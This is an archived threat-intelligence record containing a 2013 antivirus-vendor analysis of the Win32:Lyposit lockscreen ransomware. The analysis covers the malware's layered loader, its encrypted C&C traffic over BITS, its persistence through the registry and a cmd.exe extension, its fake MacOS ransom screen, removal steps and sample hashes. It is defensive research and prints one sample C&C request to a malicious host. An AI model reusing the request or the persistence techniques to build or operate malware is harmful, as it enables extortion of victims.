{
	"id": "3a943fa1-3b54-4165-9869-1a8d919611de",
	"created_at": "2026-04-06T00:06:42.768487Z",
	"updated_at": "2026-04-10T03:20:30.689903Z",
	"deleted_at": null,
	"sha1_hash": "c4d4a363db360bf037a548b8a0ecfedc834d552f",
	"title": "Lockscreen Win32:Lyposit displayed as a fake MacOs app",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 370208,
	"plain_text": "Lockscreen Win32:Lyposit displayed as a fake MacOs app\r\nBy Threat Intelligence Team, 20 May 2013\r\nArchived: 2026-04-05 15:46:37 UTC\r\nWhen the mastermind hackers of the notorious Carberp Banking Trojan were arrested, we thought the story had ended. But a sample that we received on May 7th, a month after the arrests, looked very suspicious. It connected to a well-known URL pattern and it really was the Carberp Trojan. Moreover, the domain it connected to was registered on April 9th!\r\nTaking a closer look at the PE header, we observed that the TimeDateStamp (02 / 27 / 13 @ 12:19:29pm EST) showed a date slightly earlier than the date of the arrests of the cybercriminals, and that the URL was part of a larger botnet involving plenty of Russian bots. So the case was closed as a lost sample within a distribution process.\r\nAfter using our internal Malware Similarity Search to catch as many related malware samples as possible, a cluster appeared. It contained some well-known families like Zbot, Dofoil and Gamarue, and some fresh families like Win32/64:Viknok and Win32:Lyposit. The latter is a dynamic link library that caught our attention with its quite sophisticated loader and final payload.\r\nLoader Analysis\r\nThe starting dropper is a Microsoft Visual Basic executable that unpacks and loads the first hidden layer, another x86 PE executable. This layer decrypts data in newly allocated memory and the next step is performed there. Analysis is made more difficult by the resolution of WINAPI functions on the fly by hash and by the use of multiple cooperating threads. The main decryption is done by repeated calls to the RC2 cipher provided by the Microsoft Base Cryptographic Provider v1.0. 
The next layer is a dynamic link library that drops the actual lockscreen binary.\r\nPayload\r\nThe lockscreen communicates with its servers through the Background Intelligent Transfer Service (BITS). It creates a single BITS Control Class with a background job that downloads files to the client (the BG_JOB_TYPE_DOWNLOAD parameter of the IBackgroundCopyManager::CreateJob method). Malware has been reported in the past to use BITS to bypass firewall rules in order to perform additional actions.\r\nURL names are encoded in the data section of the binary and look non-standard at first sight.\r\nhttps://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/\r\nPage 1 of 4\n\nAn example of a query to a C\u0026C server:\r\nGET /ads1/?l=P8ZWABgRAFJMQTUApAEAAL6KDni0wESS HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: identity\r\nRange: bytes=0-4697\r\nUser-Agent: Microsoft BITS/6.7\r\nHost: r4fy3cddf87nzgemobxnd.org\r\nConnection: Keep-Alive\r\nThe string before the equals sign is randomly generated with a length between 1 and 5 characters, and the encoded sequence after the equals sign contains packed information about the victim's location and computer name. 
The following picture shows what is behind the previous request after decryption (the first double word is the return value of a GetTickCount() call, followed by a constant byte 0x18 and an internal code of the procedure that issues the request; then comes the magic string \"RLA5\", the value of the locale identifier, a hash of the DigitalProductId XORed with the value of the InstallDate, and finally a hash of the computer name).\r\n[figure: decBuffer0]\r\nThe reverse algorithm that recovers this buffer works like this:\r\n[figure: reverseSentData]\r\nThe communication protocol is encrypted and the following decryption algorithm is used:\r\n[figure: decodeBITSx]\r\nApplying the decryptBITS algorithm twice to a received buffer yields an archive containing the complete HTML page that is finally displayed.\r\nDepending on the location setting of the victim's computer, the particular content of the ransom message is chosen on the server side. If the location is not Switzerland, Italy, Spain, Germany, Russia, Ukraine or possibly another non-US country, it could look like this:\r\nObserve that the background picture (which, by the way, is called \"US.jpg\" in the archive) and the font style of the command output are definitely not those of a Microsoft Windows command line. Moreover, the highlighted string \"MacOs vers\" hints at the platform it pretends to be. But we were not fooled; this is not another threat for Mac OS systems. We can only speculate about why the malware authors chose this strange disguise. One reason that comes to mind is that Mac OS X has a bigger market share in North America and users there are more used to this style. Who knows...\r\nPersistence\r\nThe lockscreen ensures that it is executed after every start-up using two methods. The first one is fairly common: it silently registers the malicious library with the appropriate setting in the registry:\r\nThe second method is more unconventional. 
The malware registers itself as an extension of the command processor, which means that it is loaded as a regular component every time cmd.exe runs:\r\nManual Removal of Win32:Lyposit\r\n1. Boot your computer with a live CD.\r\n2. Find the above-mentioned registry keys that provide persistence for the lockscreen.\r\n3. Find and delete the file referenced in those keys.\r\n4. Restart your computer in Normal Mode.\r\nSources\r\nFinally, the MD5 hashes of some selected samples with the detections of the avast! engine:\r\nLyposit (dropper - layer 0) 06e9ac14027ce9226a448625dbada9b1 Win32:Carberp-AQB [Cryp]\r\nLyposit (dropper - layer 1) 37fb38abacf8ba8c96485898c7d76db2 Win32:Lyposit-A [Trj]\r\nLyposit (dropper - layer 2) b5c22c79cd9148be71232b954f1c4cec Win32:Lyposit-A [Trj]\r\nLyposit (Lockscreen) c40b751e51d85b0c103caa3d55974ce8 Win32:Lyposit-B [Trj]\r\nAcknowledgment\r\nSincere gratitude goes to my colleague Jaromír Hořejší for cooperation on this analysis.\r\nSource: https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.avast.com/2013/05/20/lockscreen-win32lyposit-displayed-as-a-fake-macos-app/"
	],
	"report_names": [
		"lockscreen-win32lyposit-displayed-as-a-fake-macos-app"
	],
	"threat_actors": [],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775791230,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c4d4a363db360bf037a548b8a0ecfedc834d552f.pdf",
		"text": "https://archive.orkl.eu/c4d4a363db360bf037a548b8a0ecfedc834d552f.txt",
		"img": "https://archive.orkl.eu/c4d4a363db360bf037a548b8a0ecfedc834d552f.jpg"
	}
}